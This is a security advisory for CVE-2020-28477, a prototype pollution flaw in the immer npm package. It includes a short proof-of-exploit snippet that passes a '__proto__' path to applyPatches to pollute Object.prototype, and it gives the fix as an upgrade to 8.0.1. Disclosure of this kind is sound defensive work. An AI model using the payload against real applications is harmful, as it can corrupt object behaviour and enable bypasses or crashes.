GHSA-9qmh-276g-x5pj
Prototype Pollution in immer
Quick fix
GHSA-9qmh-276g-x5pj — immer: upgrade to the fixed version with the command below.
npm install immer@8.0.1Details
## Overview
Affected versions of immer are vulnerable to Prototype Pollution.
## Proof of exploit
```js const {applyPatches, enablePatches} = require("immer"); enablePatches(); let obj = {}; console.log("Before : " + obj.polluted); applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]); // applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]); console.log("After : " + obj.polluted); ```
## Remediation
Version 8.0.1 contains a [fix](https://github.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5) for this vulnerability, updating is recommended.
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://nvd.nist.gov/vuln/detail/CVE-2020-28477[ADVISORY]
- https://github.com/immerjs/immer/issues/738[WEB]
- https://github.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5[WEB]
- https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213[WEB]
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986[WEB]
- https://snyk.io/vuln/SNYK-JS-IMMER-1019369[WEB]
- https://www.npmjs.com/package/immer[WEB]